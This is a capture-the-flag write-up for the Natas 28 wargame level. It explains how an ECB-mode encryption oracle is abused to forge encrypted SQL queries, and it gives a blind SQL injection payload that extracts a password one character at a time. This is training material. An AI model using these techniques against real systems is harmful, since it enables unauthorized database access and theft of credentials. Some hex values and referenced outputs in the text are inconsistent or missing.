No sourcecode, this will be fun. The program takes your query and searches it against a list of jokes, possibly in a database (since it says “whack computer joke database”).
Checking out the requests in Burp shows that my test query “the” is sent to the server and the response returns our query encoded, likely base64. This encoded query is then used in a redirect to “/search.php”.
It’s the “search.php” page that actually returns the results.
The output of base64 decoding isn’t quite what I expected though, it looks random enough to be an encryption. Surely it’s either a homegrown encryption, or one that has known exploitable weaknesses.
Was thinking that maybe we don’t need to break the encryption to get some meaningful results. Since there’s the hint that we’re querying a database, we can give it SQL injection statements and see what returns. However, none of the attempts I made had any difference, even what should have worked for a totally blind injection. So the input is probably escaped the way it should be.
Cryptanalysis
Given the hint that it’s a database lookup, maybe the rest of the database query is in our input too. If the entire SQL query is being sent here, we won’t need an injection flaw, we would have complete control of the database after breaking the encryption.
I don’t know much about formal cryptanalysis, but I do know one of the fundamental techniques used is something called a known plaintext attack. Where the analyst knows or controls part of the original text, or plaintext, and can make inferences based upon how the ciphertext changes. We know that the word “the” is in the plaintext. And if there’s an entire SQL query, we know the “SELECT” operator must be in there.
To make analyzing so much easier, I made a bash script to help fetch the query strings instead of using Burp all the time and copying the data needed. It also uses another helper (python) script I wrote called “urldecode”, but it’s to find a solution for that.
It just takes the first string given and returns the encoded query string and hex output. After trying different inputs with the helper script it becomes pretty clear there is a header in the response that never changes. The “SELECT” operator is probably within that unchanging header.
Testing various lengths of successive input strings, adding a new character to the end each succession. Like “0123”, then “01234”.
The ciphertext is in blocks of 16 bytes
The first 2 blocks are unchanging
The third block is different for successive inputs until it is 11 characters long
The fourth block is different for successive inputs until it is 26 characters long
The fifth block is different for successive inputs until it is 42 characters long
That output shows the encryption is in 16 byte blocks, and it is using Electronic Code Book mode. That should mean known plaintext attacks will be useful.
Long repetitive input strings demonstrate the ECB mode predictability that we can exploit.
Since the goal is to send our own crafted SQL statement that’s encrypted with this system, we don’t have to figure out the encryption itself, we can simply use it as an oracle that gives us exactly what we want…
What that means is we send our SQL as the input string we want to encrypt in such a way that it is put into the output starting at offset 30h (0x00000030). Then extract those bytes and that’s the encrypted version of our SQL statement, and we can post it to “search.php”.
From the earlier observations taken of input lengths, we can deduce that our target 0x30 block begins with the 11th input character. In other words, the first ten characters sent to the oracle don’t matter. But we need to make sure our input stays within our known window where the blocks are predictable, so we can cleanly extract what we want. One way to do that would be to fill in the remainder of the last block with dummy chars.
Like this… suppose the input is “000000000011111111111111111111111111111111”, which is made by the command python -c “print(‘0’10 + ‘1’16*2)”. This gives us the first 10 useless chars as “0” and 32 payload chars as “1”, which results in 2 useful oracle blocks:
Here’s a visualization of a SQL statement we could send and its relation to the oracle window (the “+” being a space in URL encoding):
This is what we have back:
And our oracle window:
The final result is a bytestring of “de5b990ac1d04c6547da89610dc8680f39a7ae9df9901b5e334a484231dc3482”. To use this, it must be encoded back into a base64 string to send to “/search.php”. Use echo “eaf50dd768f1418c5dde5c5fd3d3c08c7b39deba42d1c907f7be64d49b0f21f6” | xxd -r -p | base64
However, when trying to send the new query, it gives an error, “Incorrect amount of PKCS#7 padding for blocksize”.
Let’s see. PKCS #7 is described in RFC 5652 (Cryptographic Message Syntax).
The padding scheme itself is given in section 6.3. Content-encryption Process. It essentially says: append that many bytes as needed to fill the given block size (but at least one), and each of them should have the padding length as value.
Thus, looking at the last decrypted byte we know how many bytes to strip off. (One could also check that they all have the same value.)
This basically means we are sending the wrong length, since we don’t want any cryptographic padding.
To fix this, we need to send the last part of the original encrypted query instead of just the middle window part. To make it work with the SQL we want to execute, add a comment character on the end to ignore whatever else may be in the encrypted part.
The corrected data should look like this:
And the result in Burp:
Awesome! We have jokes!
SQL
Now that we can query the joke database with our own SQL code, the next objective is to extract the password for natas29.
To help with this objective, I modified the helper script to be more helpful:
The script takes the SQL query we want and returns the output from “search.php”. No intermediary steps needed =).
I then experimented with SQL commands to figure out a way to extract the password, and settled on using ‘select * from jokes where ascii(substring((select password from users) from %d for 1))=%d #’ % (i, ord(c))in a loop. That will test each character one at a time and if we guess it right, then jokes will be sent back in the response, otherwise no joke.
There’s just no way you’re going to want to do this manually, so here’s my python script for it: